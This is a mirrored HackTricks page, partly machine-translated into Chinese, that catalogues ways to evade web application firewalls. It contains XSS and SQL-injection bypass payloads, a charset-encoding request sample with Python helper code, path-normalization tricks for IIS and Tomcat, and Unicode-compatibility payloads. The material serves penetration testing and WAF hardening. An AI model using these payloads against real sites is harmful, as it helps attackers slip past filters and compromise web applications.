Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 15:12:11 +00:00

Translator workflow a21a0e7217 Translated to Chinese

2023-08-03 19:12:22 +00:00

11 KiB

Raw Blame History

WAF绕过

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！
发现我们的独家NFTs收藏品The PEASS Family
获取官方PEASS和HackTricks周边产品
加入 💬 Discord群组 或 电报群组 或关注我在Twitter上的🐦@carlospolopm。
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。

正则表达式绕过

可以使用不同的技术来绕过防火墙上的正则表达式过滤器。例如，交替大小写、添加换行符和编码有效载荷。有关各种绕过方法的资源可以在PayloadsAllTheThings和OWASP找到。下面的示例摘自这篇文章。

<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)

字符集编码

When dealing with web applications, it is common to encounter Web Application Firewalls (WAFs) that are designed to protect against various attacks. One common technique used by WAFs is to inspect the request and response payloads for malicious content.

在处理Web应用程序时，经常会遇到旨在防御各种攻击的Web应用程序防火墙（WAF）。WAF常用的一种技术是检查请求和响应的有效负载，以查找恶意内容。

One way to bypass a WAF is by manipulating the character encoding of the payload. By using different character encodings, it is possible to obfuscate the payload and evade detection by the WAF.

绕过WAF的一种方法是通过操纵有效负载的字符编码。通过使用不同的字符编码，可以对有效负载进行混淆，并逃避WAF的检测。

For example, if a WAF is configured to block certain keywords or patterns, encoding the payload using a different character set can help bypass these filters.

例如，如果WAF配置为阻止某些关键字或模式，使用不同的字符集对有效负载进行编码可以帮助绕过这些过滤器。

Some common techniques for encoding payloads include URL encoding, Unicode encoding, and HTML entity encoding. Each technique has its own syntax and rules for encoding characters.

一些常见的有效负载编码技术包括URL编码、Unicode编码和HTML实体编码。每种技术都有自己的语法和字符编码规则。

It is important to understand the specific encoding used by the target application and the WAF in order to effectively bypass the filters.

为了有效地绕过过滤器，了解目标应用程序和WAF使用的特定编码是很重要的。

In addition to encoding, other techniques such as using alternative representations of characters or encoding the payload multiple times can also be used to bypass WAFs.

除了编码之外，还可以使用其他技术，如使用字符的替代表示或多次对有效负载进行编码，以绕过WAF。

Overall, understanding how character encoding works and experimenting with different encoding techniques can be valuable for bypassing WAFs and successfully exploiting vulnerabilities in web applications.

总的来说，了解字符编码的工作原理并尝试不同的编码技术对于绕过WAF并成功利用Web应用程序中的漏洞非常有价值。

# Charset encoding
application/x-www-form-urlencoded;charset=ibm037
multipart/form-data; charset=ibm037,boundary=blah
multipart/form-data; boundary=blah; charset=ibm037

##Python code
import urllib
s = 'payload'
print(urllib.parse.quote_plus(s.encode("IBM037")))

## Request example
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61

%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n

混淆

Obfuscation is a technique used to make code or data difficult to understand or analyze. In the context of web application security, obfuscation can be used to bypass Web Application Firewalls (WAFs) by disguising malicious payloads or evading signature-based detection.

JavaScript Obfuscation

JavaScript obfuscation involves transforming code to make it more difficult to read and understand. This can be achieved through techniques such as:

Variable and function name obfuscation: Renaming variables and functions to random or meaningless names.
String obfuscation: Encoding strings to make them less recognizable.
Code splitting: Breaking up code into smaller parts and dynamically loading them.
Control flow obfuscation: Modifying the order of code execution to confuse analysis tools.

Payload Obfuscation

Payload obfuscation is the process of disguising malicious code to evade detection. This can be done by:

Encoding: Transforming the payload using encoding techniques such as Base64 or URL encoding.
Encryption: Encrypting the payload using a key or algorithm to make it unreadable.
Compression: Compressing the payload to make it more difficult to analyze.
Randomization: Adding random data or noise to the payload to make it harder to detect.

Evading Signature-based Detection

Signature-based detection is a common method used by WAFs to identify and block known attack patterns. To bypass this detection, attackers can modify the payload or use techniques such as:

Payload mutation: Making small changes to the payload to create a new signature that is not recognized by the WAF.
Protocol-level evasion: Modifying the request or response headers to evade signature-based detection.
Fragmentation: Splitting the payload into smaller fragments to bypass payload size restrictions.

By using obfuscation techniques, attackers can increase the chances of successfully bypassing WAFs and executing their malicious payloads.

# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>

# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;

Unicode兼容性

根据Unicode规范的实现方式（更多信息在这里），共享Unicode兼容性的字符可能能够绕过WAF并执行预期的有效负载。可以在这里找到兼容字符。

示例

# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
＜img src⁼p onerror⁼＇prompt⁽1⁾＇﹥  --> ＜img src=p onerror='prompt(1)'>

超过大小限制

在基于云的WAF中，如果负载大小超过X大小，请求将不会被WAF检查。您可以简单地利用这一点来绕过它们。

☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

您在网络安全公司工作吗？您想在HackTricks中看到您的公司广告吗？或者您想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！
发现我们的独家NFTs收藏品-The PEASS Family
获取官方PEASS和HackTricks周边产品
加入💬 Discord群组或电报群组，或在Twitter上关注我🐦@carlospolopm。
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。

11 KiB Raw Blame History Unescape Escape